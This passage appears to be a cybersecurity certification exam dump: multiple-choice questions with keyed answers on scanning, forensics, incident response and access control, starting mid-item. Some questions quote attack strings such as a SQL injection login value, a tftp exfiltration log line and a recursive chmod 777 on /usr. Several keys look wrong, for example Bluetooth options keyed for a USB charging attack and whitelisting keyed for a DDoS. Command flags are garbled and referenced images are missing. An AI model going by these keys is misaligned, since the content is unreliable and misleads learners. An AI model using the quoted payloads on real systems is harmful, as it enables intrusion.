B. The data owner
A cybersecurity analyst is reviewing the following outputs: (see image Q-135) Which of the following can the analyst infer from the above output? A. The remote host is redirecting port 80 to port 8080. B. The remote host is running a service on port 8080. C. The remote host's firewall is dropping packets for port 80. D. The remote host is running a web server on port 80.
B. The remote host is running a service on port 8080
A Linux-based file encryption malware was recently discovered in the wild. Prior to running the malware on a preconfigured sandbox to analyze its behavior, a security professional executes the following command: umount ""a ""t cifs,nfsWhich of the following is the main reason for executing the above command? A. To ensure the malware is memory bound. B. To limit the malware's reach to the local host. C. To back up critical files across the network D. To test if the malware affects remote systems
B. To limit the malware's reach to the local host
Which of the following is a control that allows a mobile application to access and manipulate information which should only be available by another application on the same mobile device (e.g. a music application posting the name of the current song playing on the device on a social media site)? A. Co-hosted application B. Transitive trust C. Mutually exclusive access D. Dual authentication
B. Transitive trust
A security analyst received a compromised workstation. The workstation's hard drive may contain evidence of criminal activities. Which of the following is theFIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis? A. Make a copy of the hard drive. B. Use write blockers. C. Run rm ""R command to create a hash. D. Install it on a different machine and explore the content.
B. Use write blockers
You have been tasked to create some baseline system images in order to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks? A. Utilizing a known malware plugin B. Utilizing an operating system SCAP plugin C. Utilizing an authorized credentialed scan D. Utilizing a non-credentialed scan
B. Utilizing an operating system SCAP plugin
Which of the following systems would be at the GREATEST risk of compromise if found to have an open vulnerability associated with perfect forward secrecy? A. Endpoints B. VPN concentrators C. Virtual hosts D. SIEM E. Layer 2 switches
B. VPN Connectors
A cybersecurity analyst is completing an organization's vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report? A. Processor utilization B. Virtual hosts C. Organizational governance D. Log disposition E. Asset isolation
B. Virtual Hosts
There have been several exploits to critical devices within the network. However, there is currently no process to perform vulnerability analysis.Which of the following should the security analyst implement during production hours to identify critical threats and vulnerabilities? A. Asset inventory of all critical devices B. Vulnerability scanning frequency that does not interrupt workflow C. Daily automated reports of exploited devices D. Scanning of all types of data regardless of sensitivity levels
B. Vulnerability scanning frequency that does not interrupt workflow
Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system? A. Intrusion Detection System B. Whitelisting C. MAC Filtering D. VPN
B. Whitelisting
During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true? A. The scan will not produce any useful information B. You are scanning a CDN-hosted copy of the site C. Nothing can be determined about this site with the information provided D. The server assumes you are conducting a DDoS attack
B. You are scanning a CDN-hosted copy of the site
Using a heuristic system to detect an anomaly in a computer's baseline, a system administrator was able to detect an attack even though the company signature based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred? A. Cookie stealing B. Zero-day C. Directory traversal D. XML injection
B. Zero-day
An HR employee began having issues with a device becoming unresponsive after attempting to open an email attachment. When informed, the security analyst became suspicious of the situation, even though there was not any unusual behavior on the IDS or any alerts from the antivirus software. Which of the followingBEST describes the type of threat in this situation? A. Packet of death B. Zero-day malware C. PII exfiltration D. Known virus
B. Zero-day malware
Which of the following techniques would allow an attacker to get a full listing of your internal DNS information if your DNS server is not properly secured? A. FQDN resolution B. Zone transfers C. DNS poisoning D. Split horizon
B. Zone transfers
Company A suspects an employee has been exfiltrating PII via a USB thumb drive. An analyst is tasked with attempting to locate the information on the drive. ThePII in question includes the following: [email protected] 564-23-4765 [email protected] 754-09-3276 [email protected] 143-32-2323 [email protected] 545-11-0192 [email protected] 093-45-3748 Which of the following would BEST accomplish the task assigned to the analyst? A. 3 [0-9]\d-2[0-9]\d-4[0-9]\d B. \d(3)-\d(2)-\d(4) C. ?[3]-?[2]-?[3] D. \d[9]|"˜XXX-XX-XX'
B. \d(3)-\d(2)-\d(4)
Which of the following tools should a cybersecurity analyst use to verify the integrity of a forensic image before and after an investigation? A. strings B. sha1sum C. file D. dd E. gzip
B. sha1sum
A cybersecurity analyst is preparing to run a nmap scan of a targeted network. The analyst wants to perform a quick scan but knows that a SYN scan won't be effective because she doesn't have raw socket privileges on their own scanning system. Which flag should the analyst use to conduct the scan? A. -sS B. -O C. -sT D. -sX
C. -sT
While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source? A. 172.16.1.100 B. 192.168.1.100 C. 192.186.1.100 D. 10.15.1.100
C. 192.186.1.100
A red team actor observes it is common practice to allow cell phones to charge on company computers, but access to the memory storage is blocked. Which of the following are common attack techniques that take advantage of this practice? (Choose two.) A. A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes) B. A USB attack that turns the connected device into a rogue access point that spoofs the configured wireless SSIDs C. A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack D. A Bluetooth peering attack called "Snarfing" that allows Bluetooth connections on blocked device types if physically connected to a USB port E. A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking
C. A Bluetooth attack the modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack D. A Bluetooth peering attack called "Snarfing" that allows Bluetooth connections on blocked device types if physically connected to a USB port
A recent vulnerability scan found four vulnerabilities on an organization's public Internet-facing IP addresses. Prioritizing in order to reduce the risk of a breach to the organization, which of the following should be remediated FIRST? A. A cipher that is known to be cryptographically weak. B. A website using a self-signed SSL certificate. C. A buffer overflow that allows remote code execution. D. An HTTP response that reveals an internal IP address.
C. A buffer overflow that allows remote code execution
A recent vulnerability scan found several vulnerabilities on an organization's public-facing IP addresses. In order to reduce the risk of a breach, which of the following vulnerabilities should be prioritized first for remediation? A. An HTTP response that reveals an internal IP address B. A website utilizing self-signed SSL certificate C. A buffer overflow that is know to allow remote code excecution D. A cryptographically weak encryption cipher
C. A buffer overflow that is know to allow remote code excecution
Given the following access log: (see image Q-120) Which of the following accurately describes what this log displays? A. A vulnerability in jQuery B. Application integration with an externally hosted database C. A vulnerability scan performed from the Internet D. A vulnerability in Javascript
C. A vulnerability scan performed from the internet
A threat intelligence analyst who works for a technology firm received this report from a vendor. "There has been an intellectual property theft campaign executed against organizations in the technology industry. Indicators for this activity are unique to each intrusion. The information that appears to be targeted is R&D data. The data exfiltration appears to occur over months via uniform TTPs. Please execute a defensive operation regarding this attack vector."Which of the following combinations suggests how the threat should MOST likely be classified and the type of analysis that would be MOST helpful in protecting against this activity? A. Polymorphic malware and secure code analysis B. Insider threat and indicator analysis C. APT and behavioral analysis D. Ransomware and encryption
C. APT and behavioral analysis
A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application.The security administrator notices that the new application uses a port typically monopolized by a virus.The security administrator denies the request and suggests a new port or service be used to complete the application's task.Which of the following is the security administrator practicing in this example? A. Explicit deny B. Port security C. Access control lists D. Implicit deny
C. Access control lists
A SIEM analyst noticed a spike in activities from the guest wireless network to several electronic health record (EHR) systems. After further analysis, the analyst discovered that a large volume of data has been uploaded to a cloud provider in the last six months. Which of the following actions should the analyst do FIRST? A. Contact the Office of Civil Rights (OCR) to report the breach B. Notify the Chief Privacy Officer (CPO) C. Activate the incident response plan D. Put an ACL on the gateway router
C. Activate the incident response plan
File integrity monitoring states the following files have been changed without a written request or approved change. The following change has been made: chmod 777 ""Rv /usrWhich of the following may be occurring? A. The ownership pf /usr has been changed to the current user. B. Administrative functions have been locked from users. C. Administrative commands have been made world readable/writable. D. The ownership of/usr has been changed to the root user.
C. Administrative commands have been made world readable/writable
What SDLC model emphasizes individuals and interactions over processes and tools, customer collaboration over contract negotiation, and working software over comprehensive documentation? A. RAD B. Waterfall C. Agile D. Spiral
C. Agile
Which of the following stakeholders would need to be aware of an e-discovery notice received by the security office about an ongoing case within the manufacturing department? A. Board of trustees B. Human resources C. Legal D. Marketing
C. Legal
A security analyst has noticed an alert from the SIEM. A workstation is repeatedly trying to connect to port 445 of a file server on the production network. All of the attempts are made with invalid credentials. Which of the following describes what is occurring? A. Malware has infected the workstation and is beaconing out to the specific IP address of the file server. B. The file server is attempting to transfer malware to the workstation via SMB. C. An attacker has gained control of the workstation and is attempting to pivot to the file server by creating an SMB session. D. An attacker has gained control of the workstation and is port scanning the network.
C. An attacker has gained control of the workstation and is attempting to pivot to the filer server by creating an SMB session
A security analyst is reviewing packet captures for a specific server that is suspected of containing malware and discovers the following packets: (see image Q-218) Which of the following traffic patterns or data would be MOST concerning to the security analyst? A. Port used for SMTP traffic from 73.252.34.101 B. Unencrypted password sent from 103.34.243.12 C. Anonymous access granted by 103.34.243.12 D. Ports used for HTTP traffic from 202.53.245.78
C. Anonymous access granted by 103.34.243.12
Your organization recently suffered a large-scale data breach. The hackers successfully exfiltrated the personal information and social security numbers of your customers from your network. The CEO notified law enforcement about the breach and they are going to assist with the investigation and conduct evidence collection so that the hackers can be brought up on charges. What actions should your organization take in response to this event? A. Require all employees to commit to an NDA about the data breach verbally B. Require all employees to commit to an NDA about the data breach in writing C. Ask a member of law enforcement to meet with your employees D. Block all employees access to social media from the company's network and begin monitoring your employee's email
C. Ask a member of law enforcement to meet with your employees
Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? A. WHOIS lookups B. Registrar checks C. Banner grabbing D. BGP looking glass usage
C. Banner grabbing
What two techniques are commonly used by port and vulnerability scanners to identify the services running on a target system? A. Using the -O option in nmap and UDP response timing B. Banner grabbing and UDP response training C. Banner grabbing and comparing response fingerprints D. Comparing response fingerprints and registry scanning
C. Banner grabbing and comparing response fingerprints
What technology is NOT PKI x.509 compliant and cannot be used in a variety of secure functions? A. SSL/TLS B. PKCS C. Blowfish D. AES
C. Blowfish
Which of the following provides a standard nomenclature for describing security-related software flaws? A. SOX B. SIEM C. CVE D. VPC
C. CVE
What sanitization technique uses only logical techniques to remove data, such as overwriting a hard drive with a random series of ones and zeroes? A. Purge B. Degauss C. Clear D. Destroy
C. Clear
A cybersecurity analyst traced the source of an attack to compromised user credentials. Log analysis revealed that the attacker successfully authenticated from an unauthorized foreign country. Management asked the security analyst to research and implement a solution to help mitigate attacks based on compromised passwords. Which of the following should the analyst implement? A. Self-service password reset B. Single sign-on C. Context-based authentication D. Password complexity
C. Context-based authentication
The security configuration management policy states that all patches must undergo testing procedures before being moved into production. The security analyst notices a single web application server has been downloading and applying patches during non-business hours without testing. There are no apparent adverse reactions, server functionality does not seem to be affected, and no malware was found after a scan.Which of the following actions should the analyst take? A. Reschedule the automated patching to occur during business hours. B. Monitor the web application service for abnormal bandwidth consumption. C. Create an incident ticket for anomalous activity. D. Monitor the web application for service interruptions caused from the patching.
C. Create an incident ticket for anomalous activity
What is NOT a means of improving data validation and trust? A. Encrypting data in transit B. Using MD5 checksums for files C. Decrypting data at rest D. Implementing Tripwire
C. Decrypting data at rest
You are a cybersecurity analyst and your company has just enabled key-based authentication on its SSH server. Review the following log file:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BEGIN LOG ------------- Sep 09 13:15:24 diontraining sshd[3423]: Failed password for root from 192.168.3.2 port 45273 ssh2 Sep 09 15:43:15 diontraining sshd[3542]: Failed password for root from 192.168.2.24 port 43543 ssh2 Sep 09 15:43:24 diontraining sshd[3544]: Failed password for jdion from 192.168.2.24 port 43589 ssh2 Sep 09 15:43:31 diontraining sshd[3546]: Failed password for tmartinez from 192.168.2.24 port 43619 ssh2 Sep 09 15:43:31 diontraining sshd[3546]: Failed password for jdion from 192.168.2.24 port 43631 ssh2 Sep 09 15:43:37 diontraining sshd[3548]: Failed password for root from 192.168.2.24 port 43657 ssh2 ————————-- END LOG-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Which of the following actions should be performed to secure the SSH server? A. Disable anonymous SSH logon B. Disable SSHv1 C. Disable password authentication for SSH D. Disable remote root SSH logons
C. Disable password authentication for SSH
During a routine network scan, a security administrator discovered an unidentified service running on a new embedded and unmanaged HVAC controller, which is used to monitor the company's datacenter: Port State 161/UDP open 162/UDP open 163/UDP open The enterprise monitoring service requires SNMP and SNMPTRAP connectivity to operate. Which of the following should the security administrator implement to harden the system? A. Patch and restart the unknown service. B. Segment and firewall the controller's network. C. Disable the unidentified service on the controller. D. Implement SNMPv3 to secure communication. E. Disable TCP/UDP ports 161 through 163.
C. Disable the unidentified service on the controller
A technician receives a report that a user's workstation is experiencing no network connectivity. The technician investigates and notices the patch cable running the back of the user's VoIP phone is routed directly under the rolling chair and has been smashed flat over time.Which of the following is the most likely cause of this issue? A. Cross-talk B. Electromagnetic interference C. Excessive collisions D. Split pairs
C. Excessive collisions
Weeks before a proposed merger is scheduled for completion, a security analyst has noticed unusual traffic patterns on a file server that contains financial information. Routine scans are not detecting the signature of any known exploits or malware. The following entry is seen in the ftp server logs: tftp ""I 10.1.1.1 GET fourthquarterreport.xlsWhich of the following is the BEST course of action? A. Continue to monitor the situation using tools to scan for known exploits. B. Implement an ACL on the perimeter firewall to prevent data exfiltration. C. Follow the incident response procedure associate with the loss of business critical data. D. Determine if any credit card information is contained on the server containing the financials.
C. Follow the incident response procedure associated with the loss of business critical data
A software assurance test analyst is performing a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which technique is the analyst utilizing? A. Sequential data sets B. Static code analysis C. Fuzzing D. Known bad data injection
C. Fuzzing
A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP? A. Sponsored guest passwords must be at least ten characters in length and contain a symbol. B. The corporate network should have a wireless infrastructure that uses open authentication standards. C. Guests using the wireless network should provide valid identification when registering their wireless devices. D. The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.
C. Guests using the wireless network should provide valid identification when registering their wireless devices
A technician needs to collect a forensic disk image and ensure that they do not change the contents of the drive during the collection of the image. What tools should the technician use? A. Degausser B. Software write blocker C. Hardware write blocker D. Drive duplicator
C. Hardware write blocker
A network technician is concerned that an attacker is attempting to penetrate the network, and wants to set a rule on the firewall to prevent the attacker from learning which IP addresses are valid on the network. Which of the following protocols needs to be denied? A. TCP B. SMTP C. ICMP D. ARP
C. ICMP
A software development company in the manufacturing sector has just completed the alpha version of its flagship application. The application has been under development for the past three years. The SOC has seen intrusion attempts made by indicators associated with a particular APT. The company has a hot site location for COOP. Which of the following threats would most likely incur the BIGGEST economic impact for the company? A. DDoS B. ICS destruction C. IP theft D. IPS evasion
C. IP Theft
While reviewing proxy logs, the security analyst noticed a suspicious traffic pattern. Several internal hosts were observed communicating with an external IP address over port 80 constantly. An incident was declared, and an investigation was launched. After interviewing the affected users, the analyst determined the activity started right after deploying a new graphic design suite. Based on this information, which of the following actions would be the appropriate NEXT step in the investigation? A. Update all antivirus and anti-malware products, as well as all other host-based security software on the servers the affected users authenticate to. B. Perform a network scan and identify rogue devices that may be generating the observed traffic. Remove those devices from the network. C. Identify what the destination IP address is and who owns it, and look at running processes on the affected hosts to determine if the activity is malicious or not. D. Ask desktop support personnel to reimage all affected workstations and reinstall the graphic design suite. Run a virus scan to identify if any viruses are present.
C. Identify what the destination IP address is and who owns it, and look at the running processes on the affected hosts to determine if the activity is malicious or not
A recent audit included a vulnerability scan that found critical patches released 60 days prior were not applied to servers in the environment. The infrastructure team was able to isolate the issue and determined it was due to a service being disabled on the server running the automated patch management application.Which of the following would be the MOST efficient way to avoid similar audit findings in the future? A. Implement a manual patch management application package to regain greater control over the process. B. Create a patch management policy that requires all servers to be patched within 30 days of patch release. C. Implement service monitoring to validate that tools are functioning properly. D. Set services on the patch management server to automatically run on start-up.
C. Implement service monitoring to validate that tools are functioning properly
A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be theBEST action for the cybersecurity analyst to perform? A. Continue monitoring critical systems. B. Shut down all server interfaces. C. Inform management of the incident. D. Inform users regarding the affected systems.
C. Inform management of the incident
A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID of Admin with a password of "password" grants elevated access to the application over the Internet. Which of the following is the BEST method to discover the vulnerability before a production deployment? A. Manual peer review B. User acceptance testing C. Input validation D. Stress test the application
C. Input validation
During a web application vulnerability scan, it was discovered that the application would display inappropriate data after certain key phrases were entered into a webform connected to a SQL database server. Which of the following should be used to reduce the likelihood of this type of attack returning sensitive data? A. Static code analysis B. Peer review code C. Input validation D. Application fuzzing
C. Input validation
Which of the following secure coding best practices ensures special characters like <, >, /, and ' are not accepted from the user via a web form? A. Error handling B. Output encoding C. Input validation D. Session management
C. Input validation
A zero-day crypto-worm is quickly spreading through the internal network on port 25 and exploiting a software vulnerability found within the email servers.Which of the following countermeasures needs to be implemented as soon as possible to mitigate the worm from continuing to spread? A. Implement a traffic sinkhole. B. Block all known port/services. C. Isolate impacted servers. D. Patch affected systems.
C. Isolate impacted servers
What containment techniques is the strongest possible response to an incident? A. Segmentation B. Isolating the attacker C. Isolating affect systems D. Enumeration
C. Isolating affect systems
A security analyst is concerned that unauthorized users can access confidential data stored in the production server environment. All workstations on a particular network segment have full access to any server in production. Which of the following should be deployed in the production environment to prevent unauthorized access? (Choose two.) A. DLP system B. Honeypot C. Jump box D. IPS E. Firewall
C. Jump box E. Firewall
Which of the following technologies is NOT a shared authentication protocol? A. Facebook Connect B. OAuth C. LDAP D. OpenID Connect
C. LDAP
Organizational policies require vulnerability remediation on severity 7 or greater within one week. Anything with a severity less than 7 must be remediated within30 days. The organization also requires security teams to investigate the details of a vulnerability before performing any remediation. If the investigation determines the finding is a false positive, no remediation is performed and the vulnerability scanner configuration is updated to omit the false positive from future scans:The organization has three Apache web servers: 192.168.1.20 - Apache v2.4.1 192.168.1.21 - Apache v2.4.0 192.168.1.22 - Apache v2.4.0 The results of a recent vulnerability scan are shown below: (see image Q-211) The team performs some investigation and finds a statement from Apache: "Fixed in Apache HTTP server 2.4.1 and later" Which of the following actions should the security team perform? A. Ignore the false positive on 192.168.1.22 B. Remediate 192.168.1.20 within 30 days C. Remediate 192.168.1.22 within 30 days D. Investigate the false negative on 192.168.1.20
C. Remediate 192.168.1.22 within 30 days
A new zero-day vulnerability was discovered within a basic screen capture app, which is used throughout the environment. Two days after discovering the vulnerability, the manufacturer of the software has not announced a remediation or if there will be a fix for this newly discovered vulnerability. The vulnerable application is not uniquely critical, but it is used occasionally by the management and executive management teams. The vulnerability allows remote code execution to gain privileged access to the system. Which of the following is the BEST course of action to mitigate this threat? A. Work with the manufacturer to determine the time frame for the fix. B. Block the vulnerable application traffic at the firewall and disable the application services on each computer. C. Remove the application and replace it with a similar non-vulnerable application. D. Communicate with the end users that the application should not be used until the manufacturer has resolved the vulnerability.
C. Remove the application and replace it with a similar non-vulnerable application
Which of the following methods could not be used to retrieve the key from a forensic copy of a BitLocker encrypted drive? A. Analyzing the hibernation file B. Analyzing the memory dump file C. Retrieving the key from the MBR D. Performing a FireWire attack on mounted drives
C. Retrieving the key from the MBR
What is the term for the amount of risk that an organization is willing to accept or tolerate? A. Risk deterrence B. Risk transference C. Risk appetite D. Risk avoidance
C. Risk appetite
A company that is hiring a penetration tester wants to exclude social engineering from the list of authorized activities. Which of the following documents should include these details? A. Acceptable use policy B. Service level agreement C. Rules of engagement D. Memorandum of understanding E. Master service agreement
C. Rules of Engagement
While preparing for a third-party audit, the vice president of risk management and the vice president of information technology have stipulated that the vendor may not use offensive software during the audit. This is an example of: A. organizational control. B. service-level agreement. C. rules of engagement. D. risk appetite
C. Rules of engagement
A retail corporation with widely distributed store locations and IP space must meet PCI requirements relating to vulnerability scanning. The organization plans to outsource this function to a third party to reduce costs.Which of the following should be used to communicate expectations related to the execution of scans? A. Vulnerability assessment report B. Lessons learned documentation C. SLA D. MOU
C. SLA
Which protocol is commonly used to collect information about CPU utilization and memory usage from network devices? A. SMTP B. MIB C. SNMP D. Netflow
C. SNMP
A security analyst is reviewing IDS logs and notices the following entry: (where [email protected] and password=' or 20==20') Which of the following attacks is occurring? A. Cross-site scripting B. Header manipulation C. SQL injection D. XML injection
C. SQL Injection
Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Choose two.) A. Patching B. NIDS C. Segmentation D. Disabling unused services E. Firewalling
C. Segmentation D. Disabling unused services
Three similar production servers underwent a vulnerability scan. The scan results revealed that the three servers had two different vulnerabilities rated "Critical".The administrator observed the following about the three servers: ✑ The servers are not accessible by the Internet ✑ AV programs indicate the servers have had malware as recently as two weeks ago ✑ The SIEM shows unusual traffic in the last 20 days ✑ Integrity validation of system files indicates unauthorized modifications Which of the following assessments is valid and what is the most appropriate NEXT step? (Choose two.) A. Servers may have been built inconsistently B. Servers may be generating false positives via the SIEM C. Servers may have been tampered with D. Activate the incident response plan E. Immediately rebuild servers from known good configurations F. Schedule recurring vulnerability scans on the servers
C. Server may have been tampered with D. Activate the incident response plan
Which of the following does a User Agent request a resource from when conducting a SAML transaction? A. Single-sign-on (SSO) B. Identity provider (IdP) C. Service provider (SP) D. Relying party (RP)
C. Service provider (SP)
Which of the following has the GREATEST impact to the data retention policies of an organization? A. The CIA classification matrix assigned to each piece of data B. The level of sensitivity of the data established by the data owner C. The regulatory requirements concerning the data set D. The technical constraints of the technology used to store the data
C. The regulatory requirements concerning the data set
What does "bs" do when using the dd command in Linux, UNIX, or OS X? A. Sends the output to a blank sector B. Sets the beginning sector of the drive image C. Sets the block size D. Removes error messages an other error data from the image
C. Sets the block size
Rory is about to conduct forensics on a virtual machine. Which of the following processes should be used to ensure that all of the data is acquired forensically? A. Perform a live acquisition of the virtual machine's memory B. Suspend the machine and make a forensic copy of the drive it resides on C. Suspend the machine and copy the contents of the directory it resides in D. Shutdown the virtual machine off and make a forensic copy of its disk image
C. Suspend the machine and copy the contents of the directory it resides in
What authentication protocol was designed by Cisco to provide authentication, authorization, and accounting services? A. RADIUS B. CHAP C. TACACS+ D. Kerberos
C. TACACS+
Which of the following types of scans are useful for probing firewall rules? A. TCP SYN B. TCP RST C. TCP ACK D. XMAS TREE
C. TCP ACK
An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server's BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed? A. Anti-malware application B. Host-based IDS C. TPM data sealing D. File integrity monitoring
C. TPM data sealing
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework? A. Applications architecture B. Business architecture C. Technical architecture D. Data architecture
C. Technical architecture
An analyst has been asked to perform an architectural review and uses a view that focuses on the technologies, settings, and configurations used in the architecture. What view is the analyst using? A. Operational view B. Acquisition view C. Technical view D. Logical view
C. Technical view
What insecure protocol should NOT be used? A. SFTP B. SSH C. Telnet D. HTTPS
C. Telnet
While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation? A. The analyst is not using the standard approved browser. B. The analyst accidently clicked a link related to the indicator. C. The analyst has prefetch enabled on the browser in use. D. The alert in unrelated to the analyst's search.
C. The analyst has a prefetch enabled on the browser in use
Given the following output from a Linux machine: file2cable ""i eth0 -f file.pcap Which of the following BEST describes what a security analyst is trying to accomplish? A. The analyst is attempting to measure bandwidth utilization on interface eth0. B. The analyst is attempting to capture traffic on interface eth0. C. The analyst is attempting to replay captured data from a PCAP file. D. The analyst is attempting to capture traffic for a PCAP file. E. The analyst is attempting to use a protocol analyzer to monitor network traffic.
C. The analyst is attempting to replay captured data from a PCAP file
A security analyst has created an image of a drive from an incident. Which of the following describes what the analyst should do NEXT? A. The analyst should create a backup of the drive and then hash the drive. B. The analyst should begin analyzing the image and begin to report findings. C. The analyst should create a hash of the image and compare it to the original drive's hash. D. The analyst should create a chain of custody document and notify stakeholders.
C. The analyst should create a has of the image and compare it to the original driver's hash
Which of the following could be directly impacted by an unpatched vulnerability in vSphere ESXi? A. The organization's physical routers B. The organization's mobile devices C. The organization's virtual infrastructure D. The organization's VPN
C. The organization's virtual infrastructure
A system administrator recently deployed and verified the installation of a critical patch issued by the company's primary OS vendor. This patch was supposed to remedy a vulnerability that would allow an adversary to remotely execute code from over the network. However, the administrator just ran a vulnerability assessment of networked systems, and each of them still reported having the same vulnerability. Which of the following is the MOST likely explanation for this? A. The administrator entered the wrong IP range for the assessment. B. The administrator did not wait long enough after applying the patch to run the assessment. C. The patch did not remediate the vulnerability. D. The vulnerability assessment returned false positives.
C. The patch did not remediate the vulnerability
A vulnerability analyst needs to identify all systems with unauthorized web servers on the 10.1.1.0/24 network. The analyst uses the following default Nmap scan: nmap ""sV ""p 1-65535 10.1.1.0/24Which of the following would be the result of running the above command? A. This scan checks all TCP ports. B. This scan probes all ports and returns open ones. C. This scan checks all TCP ports and returns versions. D. This scan identifies unauthorized servers.
C. The scan checks all TCP ports and returns versions
A security analyst begins to notice the CPU utilization from a sinkhole has begun to spike. Which of the following describes what may be occurring? A. Someone has logged on to the sinkhole and is using the device. B. The sinkhole has begun blocking suspect or malicious traffic. C. The sinkhole has begun rerouting unauthorized traffic. D. Something is controlling the sinkhole and causing CPU spikes due to malicious utilization.
C. The sinkhole has begun rerouting unauthorized traffic
A security analyst is preparing for the company's upcoming audit. Upon review of the company's latest vulnerability scan, the security analyst finds the following open issues: (see image Q-225) Which of the following vulnerabilities should be prioritized for remediation FIRST? A. ICMP timestamp request remote date disclosure B. Anonymous FTP enabled C. Unsupported web server detection D. Microsoft Windows SMB service enumeration via \srvsvc
C. Unsupported web server detection
An analyst is troubleshooting a PC that is experiencing high processor and memory consumption. Investigation reveals the following processes are running on the system: ✑ lsass.exe ✑ csrss.exe ✑ wordpad.exe ✑ notepad.exe Which of the following tools should the analyst utilize to determine the rogue process? A. Ping 127.0.0.1. B. Use grep to search. C. Use Netstat. D. Use Nessus.
C. Use Netstat
After completing a vulnerability scan, the following output was noted: CVE-2011-3389 QID 42366-SSLv3.9/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: openssl s_client -connect qualys.jive.mobuile.com:443-tlsl-cipher "AES:CAMELLIA:SEED:3DES;DES" Which of the following vulnerabilities has been identified? A. PKI transfer vulnerability. B. Active Directory encryption vulnerability. C. Web application cryptography vulnerability. D. VPN tunnel vulnerability.
C. Web application cryptography vulnerability
A cybersecurity analyst is reviewing log data and sees the output below: POST:// payload.php HTTP/1.1 HOST: localhost Accept: */* Referrer: http://localhost ************* HTTP /1.1 403 Forbidden connection : close Which of the following technologies MOST likely generated this log? A. Stateful inspection firewall B. Network-based intrusion detection system C. Web application firewall D. Host-based intrusion detection system
C. Web application firewall
A company has recently launched a new billing invoice website for a few key vendors. The cybersecurity analyst is receiving calls that the website is performing slowly and the pages sometimes time out. The analyst notices the website is receiving millions of requests, causing the service to become unavailable. Which of the following can be implemented to maintain the availability of the website? A. VPN B. Honeypot C. Whitelisting D. DMZ E. MAC filtering
C. Whitelisting
An analyst wants to use a command line tool to identify open ports and running services on a host along with the application that is associated with those services and port. Which of the following should the analyst use? A. Wireshark B. Qualys C. netstat D. nmap E. ping
C. netstat
A cybersecurity professional wants to determine if a web server is running on a remote host with the IP address 192.168.1.100. Which of the following can be used to perform this task? A. nc 192.168.1.100 -1 80 B. ps aux 192.168.1.100 C. nmap 192.168.1.100 ""p 80 ""A D. dig www 192.168.1.100 E. ping ""p 80 192.168.1.100
C. nmap 192.168.1.100""p 80""A
Which of the following is the default nmap scan type when you do not provide with a flag when issuing the command? A. A TCP FIN scan B. A UDP scan C. A TCP connect scan D. A TCP SYN scan
D. A TCP SYN scan
A cybersecurity analyst is working at a college that wants to increase the security of its network by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must be able to scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements? A. Combination of cloud-bases and server-based scanning engines B. Combination of server-based and agent-based scanning engines C. Passive scanning engine located at the core of the network infrastructure D. Active scanning engine installed n the enterprise console
D. Active scanning engine installed n the enterprise console
The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files: Locky.js - xerty.ini xerty.lib Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be doneFIRST to prevent data on the company NAS from being encrypted by infected devices? A. Disable access to the company VPN. B. Move the files from the NAS to a cloud-based storage solution. C. Set permissions on file shares to read-only. D. Add the URL included in the .js file to the company's web proxy filter.
D. Add the URL included in the .js file to the company's web proxy filter
Which one of the following methods would provide the most current and accurate information about any vulnerabilities present in a system with a misconfigured operating system setting? A. Scheduled vulnerability scanning B. Continuous vulnerability scanning C. On-demand vulnerability scanning D. Agent-based monitoring
D. Agent-based monitoring
